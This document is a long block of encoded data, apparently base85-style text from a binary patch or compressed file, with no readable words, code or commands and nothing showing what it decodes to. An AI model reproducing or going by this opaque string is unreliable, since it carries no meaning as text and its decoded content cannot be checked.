zNp#7Ar3Rs}Y`_8lKn^(s|0`H{Sg9HnDq%J}#4;cwL4pfHHXu=^j28tR6K%ng@g)^6 z5(?xAiABr^Lxw6%3`Bqn7mzkxQlTTsP#>OR7#K2BGh`S+eMIyOac!s{Km;YttivTz z$OQ!^3=Jt}fzC`Wxio52LPDTQlO|P=K$hT^El1!Uf=Mu=A_ETxRKs$~AqPtqDpral zjS4|A1}rpSM9>4m4%NJc5e&f6iBCftHJjXkfXy%j0Ytzu#|r=~6BZqO_)vtL9h3{$ z#Ec~Z(7#zCVY`I|kzgzrU3$UN0YONO906Fy(&*8nuOSC2cMTgr1G9%ecOt0T;efJO zpo_Wm(2^wqf114#|B9u=0Rjj1@4rBh5M>>>;RZp7R0O~Pa!j&?fdFvuULBD{lF=jt z1$9Rl$RU&-Ljxfo%}rr&Kv@oXwf9g1iO}K5WR`@Gnr9I#GRFcBAs~ks-&t}BF1Wzq zhys)`@)A+@6$x2%L>_6RP<|z8Zr1!i1!gS0X7TmtA`KC75A~IVPE9nt3Lg zX{xyArJHfeIVVwAIH1!WeE5OI0eu8=NLU5DI1~djad?0Pt=W{LAc7DmWnFcc z#ef-RRN_ruSa>m(DO`9UfmMq#wUakkR8WAVHWgB-A%f^6NFX{DFhHgu(Lo2IicU!d zPK_oqR2W@B|F(c#wuYfXAChLYR3L#YWGbpKF@VIZe^Ei~U8YKqDi*<_Y7-)AsL_W` z1Y9uAgjl|mS6yV~wQNp?Jc>sjeGmri1f61MZAQ}u(uR^^Ae-u`*%HJ+qXfDou1>#Kp_WX@uPvpJPBy$D4s)o(9rCb;bNZYQgJ{EyTmlI?sg$_t6^Q!bt1Q#1*0Ht) z|EvWh>||1m45ciEsg`UiUtDO{Rm7u{d!6cLSjb{in!+kG%&Jxdp#&TxaJb1;F*RMm zS+;IBFrqNaSrd6&zo^Bbj9{x871Eq}?g*|v?W|P-uo4Nk;IVh{stP(`9~O{BfNB(C zCL|c4x&rwpzsT&520LRF+tLCFG_qNnh>XN2R;-C^3u7AN35Dol7mO7w5+e)A<+{`^ zZ#;rm3uqRB{30wA#%zxnxt-01Qn9l%@`z?=n9zuJAluvz08cCC(2C|wwG72*9Jr=! zI`Av234|a9L5M;af*5jQ!31HGh-=FBku7OzdTBG;k=_jz)(+83ZRJ2Wdb9x`2hn z>_{lFOB)CDaJv?PVs`|&%Xu1*2>^v>e+@W9@hmX~s0^e5qR5C_7Sm1Y$ssS-b6-ZZ z=RZ1>ASB^Kj~vJc0NxN}MJ?ix`W%8uo45}Pg~;I1u#gZwM1n?BZGfWo*FW3HXjz3Y z8Y4`XH!751F%?PR0tYfA^PDw;?wKG#c$yj{l+S|z=-_vb20{dYvV=3#63l=&Lz}EH zN?w9t4NXg>)C#e+u6-?RV=LP@iFUTO{Zb<+L99mAt6t*rNo0;WD3S@1|CYK6OC8lC z(xp`DQnlg~7vL6x!c6L#mx7iVYj#kAkfFQXMS~lylQ{__fJ;kB3$PSfF_-9Zj=W+( zvz}E(X%+V`h3wcBv4Bx2mEcpXG{o0th~LV+gbq7s)uXTgw?Mdop#?~U-a<)*C$jA& zVvvMX6jd-nRk4^EVM7TrATBi&fIu>v7?Rejtvc8eS-7MEekb6K9JOj35A8PXcSq0XQv5oyH&81R`jcybMC3A)TZAw#40(5lD;|3Mo7CV+u1KVSzB zK*2chqR_X&r45ThgmwRz(V&Q-5J(9`1ip|4L_pe7HzAxGZd^)eB|t)4T4rQ6s-Ck1 z;zf^n$>rFUUz~OBgl|qzdk`}s;8_AtFnS0D9$+KW@iW8<_`qUPmkd@EuOv2+1ZA=C z1T5qYKmZUx04z{C;a&Sd9l+;OVl%+JbS5MbxBw&=kms0K0DIKlf+Pq*5bm+a+~{V2 zox{pOe3}(~SV$`X)*6zw5(EwpsDSj$y@*M4fzVu*kNynMfD}Oa4;KFe8U6qa3W>o4 zMr(j3o_Rj_WB?2dU;v*Z-ayDakXF1p3>H$fQ_4)+EYq2d|5y=F4ZFr%6c+D77cl+@ zqEON%lmsm^Yl~Vau~te;cOeU-KHA$-z3NuKI@Z@z+pJfe5_H%As1i(&3^Xga&9cK# zJW$`d9B(KUNN!n{n?>hx5xQ82TYyu2$x@XOSV$>vS&A9nkj|tmU--hObwUC{QHv@H zo+Zup=#oCl7myRKFCGo4OBQcMky0YX19WnOD&hBEFmZ$l>PQ7dz@-ud? z>4_qM$x`Z7zYW`jiVT)I7DQYCo*XM#D8{43YMC(?bBxC`MvEXIW)rqQkF+sH@p%og zcxlb#_C&T8G!OU8;ww34qhewtPiW=IBqkKEKA{)*{|6s#jjpZ8X|wt|A`r^Fb8GT^ z2m#=eINh0d@L7260MbN&oV{B){1PQG+7d0wf$fB(;T{9j3khJ~s(9K`M3h!y6s?sM4N(EW;o5j`02aiKT#=Po z)Cd5mfC@YW2@solz`+4fMgy=yG6aCc5#0Ut4gqa}Zal~4HNFai& za0urZBNjY>8o-^~xX3{4BH?13~;LL>0W+1&(M7y>}Ov!*@K^9mCJ_f=b_)=T&V})6X9!bDF zHX=aw-YnrG5jF!QltF&%N?zEL)8ri<8~_Ip2pv=biZs9ucm~KFOqxB40~|<-%pm|= z4e%U-*2GiSJcI^>K?S^}HAKQT9?dKHf-e+^)Qnz89DxPM$Y;d_TnraM%%sIwUiMYO zt5JdnG}otjpm|8%0#wRGo{>&Co(e|JDUnRQY?4++WFNHMifs;DloXZe<(-X3c!YsU zID|A}0UO8;cr*Y?648M?1r|sqOwko)+(t;K0YX?p49>;2Cs-N=`W zfM?(aL3BZNUdn};#soa#ZOB2!w1@ymh)1Sehcpml`I`jE+?5>&;9&uE!iVly7J(Kg zLJSv>AjFV4LJ4TVI6xBAm4#oJRFzN}oRpR=o=}!Voh}L^kOrxc4yl*~Ba!wH9hd-m z0SmGWSD%bU8ejoKJ)=U-WCrYkB7lInSmX3zw*YD%%-7qs91fU8E;^9FC7%DR+ zNnU^4mpthN|D?egyah5QAGZ)vZn_X)gbqRY=1m|15IzXn*#vdIM*&=9Mx5b8 za6kkcT(T8_gfz%!7=j8ImL(K`H(-iJ$ffGc0bF?}J)I%lQdfDpNCoT~N@aw4K8ONT zs8+$JXXx#S&}YusgdW5Rzt@n+Z2T7 zdz`||d8Y~-fH-MlhH_#Bv2KT|$cMg%C8&hwrrNNrBt^gn2i!mgsO=Omtxw3P(#>cK z@e?hs7LBr241LzrJ@1i5uk=oD))^`F-cTnMz`aV-OlU%Z$Wb3$Q?sbRv|>^TIFwGP zfeLV`(pHx?|89Y6c1k0JqXbmSH8sis9G^K_3ngf&8Z=U)fB|A6V%{`DJ*vSqfn;hP z0Q&MwAe=!7!VO1m<$DPvcF~u~Fzrv)Qb>3}yPviz%MQTpG*tN+%oo23tUT~9JqaZg z79_q$1Hgf)q?xaYlLFEKX4G*yxfwfgN5durf$)wcm=k;ejFQ~t{TQ-!P{QT*57<(d zmcR|q|4=ckOrPbI<$u{P3fs$Q)+|&=-WD*xh`Dj6W^YENn&favCpED4cInLc?LgJ& z(^>@RKGt?(!3eB|>fpr|f`G)=cj$>5|-d{hA#qarX8&rpS* z|1f6=1MvfN0j!8!+F|1*h~_qGFHp3FBZOuG8-f6EEo6Yq%|O*0*YC~{fE`Fkcop#c z9ssKt!mgGDsy5OISOX|A)C3pb;!PfW^~h~RAjAZ9@K&V`3b*tEc;i0v=|D77MhYExtYBvcU~wqqluH5S}T zpNIg8@pZOP_7mR{7S{zcRv9I<<9^)09smJ}U9n5d1s!;StPB}xtN^(j(L}Cd%TV>K zsJ0pmr%asE5gd1;oB)8vagwMc8#qAPbbzFg0q_WBNE8-|ER`6P0VI||5_*#x|CHw@ z;L}n4C0~gbAi;}>SW~R}z2 z)0l+^fMTi`kk^7o8&J}%tj^RBfTKZGBOn5I2lxqGgAC5Whym4tM|FrqyQKgq z-NXYN);R&e0mMcn@Y^Nyfo+%~$2uMz6zkWTK^M$tI5YV}5TU>Fl!=`8$4(GE-$>r% z2!Im=34{>|iPmRN%>k&zT->GOE&_F727GKnB;cxj&kuT90w`=N&5a*V|1AqIyTL?n zLYAi!J)z=5l+K)^cWgX_7NJP}{ULk+?c&tu*t(VymZ6^Zw{f=en-%dYRZX zub+vp$5u;+1R3OlAJDq2<3e{C2k=ozcYz7dB0Da^`mGaLtcwX5-~z3yG#2E7w!cJB zuotfMfmKwyD0$8;D7%;N?2balv!C>}r!=g$#Twwkjp0}z#H74aL47z0F606kF#Gdr z$t(0bw|9vj>`4|}`SE7N8gxM#MA`AmA{E@iA4vSZqjX5{PCP-GOu>7O5(yckLBwN$ z!NdEQ#8Abr!5Z8FtH=A3tU-6JfsG;^nRq)aLhrWQya|!D*@l2P|7!`rv%9>@JQfhW zX^F}HR3g%~d@dxtYQf?f2>g=d;Jdeiv)i?YtB74>2I`I8E-se592fN;f3E#igu)lmQ^1R)re9lXq)zf|Y)neMy zJ=Qx3CF}qOKE`EZ_AMJwg_wzsmVM2`JxsW;p|W{Mq^t_Xz1<9*WmwZ)7{-?@sKG{u zqZ>wpgrmE|QA&e!OR3u!(nzPu-~|N)r4fPu3L^e{dIW#WtGlnGGhPvzZEWe zlQP|mUiExo;`-*H&dKPFgVVkftvlaVE?9l8fBXE;S1^Q=K=f=P9#KwV~{2A z<}JvsKRG{~Tb$A5@6nrd{QK8mt_aWm6zE&AWbRh4p)4MC`KF7zMr4*L*(OM|x6x=k zN2p}OJ(~}Bh+3&yXv@wF^}fqvLD`$6#d<#$^RQ^61xU*ds)&IpoIBf^w^s=|-*3k%s= zTRNZoFKayF75y9y0Od!uoWKtzX`Vk>hvtlA2}8nT|H!gGMn#KH zn8(HLB(qOQ{&&DOCSLbt%p4Lv(MC%tYnz;u8RjpXQhK3{exbtk-w$K8$rxor*>g-k z&E=PR(KFh=)(dBJHjDOWbluvc@5#|cVr=y|Jc{Ow1+K;P;Ju14^FzOt4(tqNUek*f ztabi%*qd8nI2IKmC+ruj9OR0ZoIS2_I5V0-BbN!GeH<(9v9F6SiUt4LTe*}fP_pWs zqr>@fg#01mrSF|avd8*1X7`fz8`a16Q zHT5R-88Mc@gv~y#x5>X=m(E1V9IUj)91E0fkePMkEr}A2N3x<>w=LTAIXby)DRR%a zeX@AM^0)f!Q#HITmcGP~lql))_{BJ!M*2YA{2MQQp2~cwSFtagF#jTgv%Eg+s`byE z;?&&sO~W+nPkx|6wao1_pL? z=R#c9?pKTd2)*q06&2e4^;F$h|FeHcIC+U>FTA^=W=>>mL*89{K=1nF?~UKD_ZnTi z_VDNpjWv|tzctL@Hr5gLC`&d(ac1rfrkVe>Uxt-@#jl2HL!ICw&y|Xoc^^anE$)7~ zts^qIu>CJ;M=g9-zT8J#H|SH>?}Hf4N6~Ew54#IqA3rBnm3&zvb>1;sc=*^V>B95U zYss?x6)!_8H`QbhG^3|qUwd`g{dFMw++U8LKi+Y<-dMB!s(d3MtK|EE0iOMi!nII` zb0Fq;{ATNj%$=vKrGE~42c+(sT|?VJuGVTRLz~IJWjz1O9m0NdxfOo!pF zK&zYeMa+M?Euyl?9~ofn<^7|yXOQb$-QbKIGCO)OX-zF4Vaz9YH)-bfWtc@m=haW_ z;UT`({QF0#nn=0E6dcpUf)X2%=CZ6x6O zyy6+6_QLHz9j-*_%nTKARI0zWQ=_Fx4`Y1;f5RpQIhFI!q2PzZmet$tWS1!U6W9zNOJ`p}HuW-bvIxv4-^!%Rb5;1PbWlm2Y(46+l zoiE_*Y;cmh@?y?)Xn4{ZaHfmaRoBdx-9pjW+f=xB=6Lo- z-HKo38su5tyQ#VE#d?E#NQiSk-OSw^UBx{t<-DJ160)fw>cvdUNg>)*dh)&H9@Tsn z8T4*;?b)s{LeZ2gARlBgBkk8X5wlI*lJ1XtQ}Af}sqDOO&yf0rSkX38hR%^=d12bW zn^Dgi#8%WonXfVE>Rj5dc)9M+`#26^zL&**$&xbiDfVLT-?l=&2v_w!T}Kx_+P4L$j(8?e392 z8ps!#YhuH@-0F<0&52-nJ|!X;_~(aD-V>*rY8);?qOlD;_g{)NbXsy*|GW}x`4Rje z?#0Z_-%SolpA%48i}nIe@5?em!@jwY(9+re)T-d9es`VEF=Z+^_-b9s_Hog}(Ii89<`BwUte@Anse%efz z6}Z5^i|Epv$+#5rUpvPpC0Fx#%A1%KmVdi;rGFMPZibK*UVn56ms@Oj6Z`0fz?V@e z&4p-fijXap0qSMMEQy2gZIrxreVcgsCSTmsw*uc2xTaRuWZyg14q(UdH`%=bS5+sk zeM@e5`iAFi{OE;CBFQWJC~sOO`Q+bs=%xWvNCb$5Wn zLy@+4B!d~5`4V#?aY5kCy_J9863&`helG(NM?sr&`^Vg4Jd6$L246#~j_7^x$A@#J zrw5Fue<6h>@PVC^;7}BpR7-}ZJ=R%ixP1L*6+LoUp=C#|3Moa?d1nvMmT}fPeTF~x z?|6lNs(9~ojg$UY5^(A(a|Ee5#oszPvH^1C0au3UNLhf-gAOE$k^k%5nEYqMM?m#F zuolWiaIZ`4#Xr$K{`WRmS=$pO)S-4B)NK|T4TY?Ibru0O%s6VHef%#i(%-)P$RMkA-Nf8!N;3@cib1u_HaNCQkm;(8Cc%*VT zRBNC#yDr{*N&kJangJJk4nN^DKX1-CW%;g{tjEjwSjM)KS9Y)8*ohQSmum92bM-Ob zTNQg~&&R5l?LP}E=XP+mb^xaO=V@32dr=Ekp~xnBhlVhR!LM73%-B=LeTP!eC*M1t591KY&?_Qc)VMhZ5NkL~4mqCWKe_>*og z5}}9$$#ND)&21?O&;GzkD}D3Khcx7L@Mp_&6)MV2%dfC1Xo8r$H+bGQbxg^#qO3_(LWu9tRwNYf|27=;=u;1-~D1h*uCxbsx z{n;QC3jp1tV#SHDGMcorC;s9)TnG?`#cO(`XmU(x7Jldc!OnCt$@d}*KDNo&Sa`mb z$T7vj+xhdi@lOSx9||!-EJ2^q>S5=SnpBbffZ72$q_9S73n=O%G`D#4W#|YcD~W#8Z(mj|=7o{W8m(YcT!AM7$+oNg1N9HYDvMWJ z7ZJ%VGD$fw0b(tiy-f={Og&QU3soHG-VSor4#OYJ6jjZoTA`jq^UHWn&q72Z6&Ak% z?K!Y8SkgRGUKl}EODa;%L@TaAt4&Ai8@W6R`j4$K67WY|RNS$@rETi8q-iwfALv9r z&xq$?SKExjvVn9h84~zYSl7u6y5$JNyU%z#%JnmAbC^vo74-NylC~E9HNHwcfA@2MDWpfu1c2x6mwNsd%k{H}MS$F-w-MSm=C=RV>wm&4=&~ zW3c0BXBA}t{6dGhR!erxbVlKh2NYa|W+joabtg3(*8!bDm=8e@e9IZmZ)`Z$fq(}~ z*fCYhpBxIyu|6&afk_f+1py-4PWs;^3vb`6#Ewy0h=EC8@xpLw+3yG9fmaYRAA941 zo-#cGeF(nqA8cS~KOa{!-Sq&DB?#59JS$S?{jCJp1pWBUikuMqp%(rYD?CPH4a{f8 z^|Rj8kI<@tp2V>Vlf4aqE2vHbLZbw{x zaOg!3yygMVo?dRTZ@3dIxRck4#v48})YpTQIF?DxyUZ$rNo8|~+r`W(X``WPEUOLroq zKJw%(Az)QDp?3)|f4l~xa4b|9{R{(gr((^kvu+V!p4e;-R^Rr{*MVH~BWQ7ZCA##B z>N!c=)z~REFZ=lCg$g}H{+0#*N^AZd9Cc&G=nTDGQEFm@O?<0r+Q4P{s5Eqsi?Qpm zDrGt8d12_4E6Lr%q(|>6PA^_lh7>n1U;9ZW{k?Mi=~-;NyT~S?INbkQz)SbAm-j*3 z$yxVYp?gBvZgo@#AESZ}zF;+z06MyR{T?o%Gl5jWSsKSnh zJt#NNCpa_W^%y}IBp|~f9{+-eaYO^HzhU7PpC#bxyb_NGa^*VNy~Z-rMKDfd@$6#I zJZUN1{IsxerIB&Db*|O?)kEg_StgUd+U&70BNWg~6AOv&0E>6qL&+?%FB3^FSY9vo zT~FAb4L40JO1hu#63m>^hT zN*Cv4Z;e9MJ1YlF5J~YE)&GAqW79hI` zh>E^e|EFc#RgGyARHDZ#+;230Ub=SR3>_UP0)k*R=x$&lKpQBmf5uk^s>QoWPgTeW zk|-_|W+h@57zn5s z1)4rPRxdl|E7_JxW}Gk|OGxz~G8jI&S>eU$t6IbQw;}=0*@k5l)PqbNRkczv?9Q-6 zG~+7X*^H)6if4G%p{`6|7(2)j@#bV$tb%%Tifh2+7w_(CiWmx6BoP6eoOh!MSf$dl zHLTmZ0TEyKQ3k^N0Sux%jHlGfwU=1hF#;(J&U44wKh93t$Yvg}ilpg5w;&8fY#m3k z@JN73#mA{{(suU9n&_)L;dRXef|aRsID7HEzsD#6n| z*o{O+-7R?IO3S7(8$V#Fsz-;N*z)N7gQrBf#!?e49bu)7<*HZg#sZ980Jc>TvseLP zb86yd?5rFfTTu$0@a*&vF=L|ziM(bPeJNI-2ou(k)}XPg={;etVZ;FJFVJ3T(wc=p zkW7!(!bPT{YHV#KyS2_d9~Hcg7Jh0IjoDu&o%=#5Up0k87LY~p6S34O=+;OYx5$X&1oIYRS8YsaJ+&3j z?f=GdR3(#nfSG`I*7*as)&AVMH#z7E7l-`+r=fDezB=NH`tu*KZ? zrHXggDM#)S6P)_!K(!KIBOR$YA80 zs5ZBHVk@142<@RucmMtQEwSF7FrEnI>v;60Etbx5`ieur>%Zg&pA2Q=n?1%OnWH-` z9KU%tyE3xUjrzd@**rSthY@zZ+yA+ok6CQ^on9|K*C=imN%CPR9QvG|m#Y8hDYyU{DeCIhkYR@_e{kJ?Le* z*EWkjhpg*3!8E^Zx&bI;m7T&5GJfoiSY!lG2&eJy=)gDaeopyVr|vkWd)?%9jjz@W zFJIWy+~KwpI&aL~I>e4K1sY3xFx43{2|IJAutV$EVQI=?V?Gq!f!ZwgNJ-%8tqXU@ zd#U1l_U^GWNa1F+B zyBs_!Vm+jtjOOM1a~7Z5*c_SDU>I3(v7xYcvCbxN9mKvU;rTk=U9;>z`)}l&f?EA zni+fMroC;|RdR{PXSvMh7VsXow^2}+(q;KVrjmd{9-e52>#tSoCNr*`&)okGDZ>ZfVzyhxgmf4TURt=Et$tw9vrlB8?g_lZ|28aEzmd?!viBcOnQWu{#SE zNttNAr1!r3>ZPqiohSOi8B9y+5zvfp14zj{JO~r(DSr-lz86)^`riw{;Favrp&_EO zB_1TFaqjXgg*$Hd{SSfb+%@Stc?P+;^Opk+*%i(7`ZE>96e+)6Tue`<=u1~y9HZ{( zL(;z8dM^4?aR_zefPz^lJ!!Ji##u0`-9;cvTe$UBmxxo@s?3on4E?WPfuUj)+Y_lw6FWc$zQ0f&hXQ!_ELVrDk}i0rut(iC1?!^_SIUBfmIuh9 zYPf!=wKOPXk_<->@=VjcU|B)5b5Hi*(i+}wfEEbwHup`o+vDs)+zxt5czy2qYBr8N zAMh6}vwdDaz~8k9tiaiJ@1v5>Q^>2ubYs=x*idB)di%su*GQ|^wycyDqxjOR`KiL{ z;ox!YnI-DY*8BX0{vvMvs>S8c^APQ2BPZMnGcMK-6D%vje~9}u8BbSKxBGr-x<8-1 zNaop~s)TMCz1nifDU%g};%tq?`wddeXujBXDI4+6iX^hP7qqrtpC@q-bfe239o|zZ zYq|jDrg^F~CkzPtlV|sfcJxLSr6}erV09)xwZ=g*$y{W9F5R)VVi2UKcZdagu|&%s zd04`UDc35tp<8z6C`AE6M}4e`%m3Z|^-vumk_;4Y*bS2Q9LN-+uo}*%R5{F`YlZIo zl53#S{#J-O3C2ny%mHkLUjkT=+UQb`dW*dkC}@u>iq9f@7o&{VI@6lG}r0IXOI5nIH`i*bgyGLIRG!a;iaqK000ZL}my z8_EXH$rznSWxfF~G~TF&$^laN?!t{+#2_LoQe$vNvbc^{md@RJb`DcTn1X0681Bg> zARSRZ_2~+*=o3I0Nlx?d@&bgUnAL|Q$=wtk$e8-*D8bi~W;(0K&KeI$@)o`+Ey^zb zAl3};rSE=`sK;Bd4y*&ktD9iAK%U&h2S{O8i@Z3=pfXc`K46-r8kQ|TeMqzm+mMP| zF4vS{oGL4^Zk`hxImn)x)1WJNgiH`_Xq}b^++YJQIp$p2pSU0bDTfB94% zBA;L6YnkrDDEY5aGo?~5OAW=vXX4#OMbeJ%nEJPthp$_6m%5Bw3AW{y^DF-n*h17b zd#6BrOSpaJ1LbqP$OBi>zUJIp(^0e?VS@exz8cSyk(vW{H0o zo5JvIOCSA(KdT*A3*}=QQh^3l12kl}kKPqmhlT&rb3$~unYow$aMr(aYSc<(bieVU zmx;#~|Re#{#}hw6pnX$pO-7Gv&1dlBSB=l3`}xmJBOBrmk=Qt%tI^?!FCS!)40G z-$%ZmHY^^XnaM8dwY>l83tQztTdQGVteIOK5ESNAlOXivj-iNWTSOT}&)LLl1EyhX zTC;kSak@;j4uB`>U?6m)5pG;rhiN5w1*>F~uMf=JZp`f%YC{Y=HPlU@Eo1uu1 zwG?;pI5YKW7A32vMl70K)@d8x+{y#r9%^H;N&vn9U8~wlxxd z_Wl7C?Fdh7iwPJ20?&fDdkj<)sPHJT9Kh%3h5O8*5Dpp7vKc z&pqc#F2sVng_sm0lgI5Gcr{8bh8r^u2yO*a zQrVzF2<{b$++#OG3betny(2OQyH% z@5P@qWN*dWbV}rw@7y{(PB_w}{?ZJ4ZK_-wP!*(>Qzvn&^L`b&=az{>{88Yo&)n!5 z9I#FZY`nzqa2YHbkbk)h^kMUMr>E9=EMxXN7I~uPtQ~5q8e4`2Dx~xMTXFOe`me4P zuAmW6w`orx@}Y3GGRK?;SG5-Q$Wb&9pHbmmx|+i$iJ*fO@IcF1jE=ExvyipL!5|ZA zi2&9(7j=(<{$lc>bI|5}kju(MFaTduHCWzN@b+-B?q5hp3&I8f+{*`NzY}PTsME;{B19m~Kitsj zXIxzYqh}#y5kSMNJbWhD8i`imy&krI9hwKuivWga+I_38ql)v^Y%@sN@WiV(9^y9U`b~mno|Rj>9P~* z1`6z%QU5@zo_{)rc!jMIs567n@e2aE@AdqV75S_UzCo8>rO6uM#}jM>*b1sKj8 z0Y8hJNWsx{W-X~^==;bt)p&7Xy!*?_KIDiU!8Uali8NG1O?x7Z*wah!`X#mi%Y9eE z9)JTN37{(6p#aAXo9;_7ccv5GY{CUP#CU8OSaG2EqbB86aSWINxMW6XfgMk}>7+pg z_Mi``eXl+vlRTd*!ZQeaP2N}+Wd7M6W_Tu+;>kr5X)!t=Ls={_z7Y^uo|vd3>b`9O zVI!t+7Q{m{JJ-_qq(OYet$*z^GH(x_QWTzs!+28(QElEUlC5mPoE5-?G({@|hMZ0M zP_7+1DS5?5Rjd7~SDUSD!ycktY0}?OvFd@z@ElzAAKc2$va0fsdfu&yGD^)*w9LCd z(qJ-De^|vMU6Xi!)Q!pV+@IkV_4Y{^N2-Y$3y^`nHJaf(4m2qv2jpfHx!8IHAseTf}ndrO;cd)*(si*Zn1clWF&h1oer)V z()hH8^s2|>_{J9MX{74Yiw*V4{m|^pk{%hBzQ1U*)y7;ixALHr%Anpy^sP&?_8t(R zTQ_m`>R#`Ej*ZHCeK@bnQUQZqLOfo0{X#d?yQeHPs_d*2AOvMt5&`z=hpyroRza)C!&P7*_gl#8YIvEPJtdgj_l`2ui#=hc`yoyY^>Uncj!EGh-Di-5W)ZL# zfkrZg898?(P5Z0Xe_{$n>`w1^g4J*$R&5YHKtmyp3Q~dQtE+>iN_cQJ+@TFHpmFZzXikkw>=}?w>@pFpoCVGo} zamxfx#Af9s@oxylIe4xu%klmkd4}7*+7B2*0mwc5g&LaQeDydLiP;JT`FiJhmDn=OuQ7?? zK#inMI{%C3PG3#Bo}S~&|VC<{!%w@h0Fg?rG5r)k?3?M6xMUgKL`5n zuY#oKJZ|m-&g28mw9)DCg2LIG>}#_G+?f$!GX@e36OA=R-9{{=DCSd?Lm5n&&>mQ6 z;Hc`+Nc#KF0@^xm0;t71!YNvZy|eRx;?o#LpoI+u8nbuNpj8fy{+PJ6lPib@%K*ag z97a_rf2?T?7I+;4#2>*g(`!(7a$6_fJ^D_v>iPA*&GOWhXa4`j zMy4QtABN|ci=5ok{p#7}Lkdt0pYof&;4^TkIwRm~#lKZIHIBZwikFoCaaw<&^que} zo%AYTSH)hxLG+v1HVzCqo=)Mfd+t>SmWAnlC#U*0^lI=lTw-Rohn4Eb3ORI zs80H*zB5V4-NRN0MWl;afECzc-Z4v+;4bg5Yz)*j0A+17QAfV_DWH}TTc!h~lP7># zOlb@{OGR_YX13rzU^%n65w_LV1eLr!8edvVUc;WIaz>q*CSxzelggL!pp{7@b4=k( z1p1P!iEjauP2J&{FTHp_!4@HWR<3!)8fmb&dEa7S1!fh=sgUQBg)Rtxa?FxPDP3bH&v4c@yzD(dcoNnUex@ z<%O8`7ZRV{qs=u7hZK!e?oiM+I<2eTS!Uu=->Ls0b)<3UxL%WOWKAjcm=)CB3@y^Z)dA7V^ zMKp$O_dYdOO!9ty;vG}rs98jZ_PrX$nZgEmV`DzDqusFZ;R!NW_UqJu12x?09TD52 z(!!|F7xtM^_N@CP`20%^c(`24d8}miu58RaTQ;USwjX-VuBdQJLRiuze=C5v~Fzq zD2U!Gmsc0Arm!GnH%cFp<=8~oWw*zgaa*zd3Y>mNg?zzl zfyk+#e&A$-OnL-cqe~?!mdHQ!cYHR@UcHtZC<0*Q4$SPEOT>5Fp z&wa{B_U*92cZ)xwMt3+JfA)yclYjQ#w=9k5(>&MtY8+O)@QYu;$kATvLTu5v4fCG^ zNqf^PwQRk7vDPDRvXy}Ln;P&#O8E4lOzWOUB4$>yF@L$U3#BR zxKu76d0&jYhp7MVCT1e&pvTF&K{4KY05l%yTyd|LZZQ7TvO#KU%>t`)r*m@yN*E~K zmrnj>cW$D8-Xfj4c;?oNs{ zJXFyzf+{6nI}kB|YnmFIhvYME7JTI%zi%S{{Z?j??_Jx}G4p$kg*hGX>7vS=-G(Le z#z{aiapf!K&RuOqb6K2^j#~0_i+qK500_<=TAxSXOz9)!+oK9D=+Ev(3GlHQDzEsN z*wB0uM#uzX$)UXeML{Tk+!EMDgqmT2vTl5EK44xNAS|c|#DjXFKTCz&3z2t`HSOEB z&!}UfFvF-Wu#Hrd5kHM`8NI;9S z!J)zohD{c}h`^6}-^ypM@ftG0{YrUuc}D4ow&FXE9L`_qPfRb~Y6oDWqQCDfhe z)(MjZrOyhnzBD<5)!A1iCwg7=esHX%j9XerS38qX$~ph1d8VY|CcoH+K}(6#c;>tA8<%9S4bB^MvYeibv{@{|!9q9!TYf||A>Ci|CH_*0onexexV zJepaBrj^F6?_S9rt2pzVrXt9#lTKiX+Ae~lV~Uu2BYnr3(1RX{xcR}=i}~v6;JG-N zG(BzaT_eLp>A9sdfe9sLO9a_t)7jaRbpEn%KA&;WSAP4L;L8rYm?AdLzGdN!kRjyX z_1#N57lM#GUof`K(Ml>j@s+-)*}2vkRnpn}K_}|vBu?-9!L%YpXo}sr0sj+!M7{WD z`KVMq?yh{yi4I+}zw(J`Y;MBO61JEdZ^kzH=>)s3yjp&2 z-T9xLJDbud3GV+*pIOo~WeCZ=P;n}FzdViUaG&0o^v?=JTszS%KmmE4jKsxfR1ncI zT5E3^u09#o35zOSTko+(+`E+%5@%uf@TUj{YlsJK@Tc!=8pWeM$GvdXK@9R)=-t+DdgE+C4g4YzXtIl2Aez%$}d= z){SgmdHwC`XwsWs(=i=xhC9Ile}6Ll)%G~SexMUe$5?ZpT^&(>vwtfs`F+6aLu$Ri z{`dCtKkfA>gCc^D3LYQV=v_#hFMV_1nEOU^R_MFU=k<-|tJl{5UEi5fS3tZNDjrnr z`{r}^&Ea#{^}W;!$tAVde~Eoe?(umPwyJPpVd|02PvZ2SIOVsyL!;M!cRs)NZAC!% zJ?hV_!mWS;Zc<`sfFHj%?(h2x3!94R28SOm-1xKd_7sygraf@sIwiXA{WM>%p)mQl zvG;e1PS#%M-)N<|NiA6i8jM1N^FK)#Q~Zs-aQeCU^A*j5;5rQgIo{`SG~l^d`h{^H zTK6mQHZ8p~{~u>e{~kI0qYRC4h*piw`1}sD51xh=5 z5s{|Emh)sZQBtgS@O;PMG2b~4Te2iTRk~=P3W4WK zoCE9FZGjx7ER0DHkhUqhIIuEKIgJQL?53cPilKP`JwS(ZBk^p%X!#C1#~3Xz;v=(+ zE}East^Z29%=1DxR#Y!%R{rJ~KotiuC?g7K;%tHh<;o}ml16%P3f?pwBMVowCE4;D zAtZ^lpBj;pL~q%<|ujAHt)>qAC0mXocA1;j5I;KUF}`lEbRn@GHr=LA6p&Lc<{tnXrSA&-yrYOB*=!yKIi3Z=hiIko~CK+=PkeDf1v<#MjPirxR zC6uK-bOiPGbUkV$dSQlEQXJ}3>u3!85bkX5LYup>|k z*62Uk7o)v^RNRZ9-l>swV9!Ah*>-}wXKA5b@a=D9bIrsC#`!vAl2wJQ>6-1bt<=&7bbMZb-&J?6R#9t3zHf#yU7SntNnV1$=Xe z3`J3XuN#5@9r6)?L;jI#>|ldk@Fx|B9tv)cfrRoiA7gAu+!MO#rm2z?Ft;h0$rgx( z+pAEl>d(GF(G-OnY7psX!;We45&2`SwVv$^Y0N6dJ|#eV@G{ecLx%ZoayO5_G~cit zon33%ZOzWu2M`)#eN&QT39-HHEAeIVtQ;qP<4?!I$KXabdITfVDv+dYbHD`oK16;| zJ7dKJVG+QJQm3tCiBf)G1kOeo1wk-VuCYU`wCzZHWP26cN_Gn5L)IMAl;xr!qR&Az z(+2%DMVEOFM9m>_=jqkW1cX$R>gP$2Sy`vKFhfVuiT%#FsqdE;{2vyre>vg?C&EA5 z?MInjM9!zy6EASUHIBwXSSj|2=`K5}*TJ-B^2o{%88&NXzyT*F8-w5?tCB{67&t5U z2tLpeg|my3hA43`8%7Z6zSB_dkuw;!tOf{SYeYU8m->*c$xJ!_3q%hHvFET&VThFu 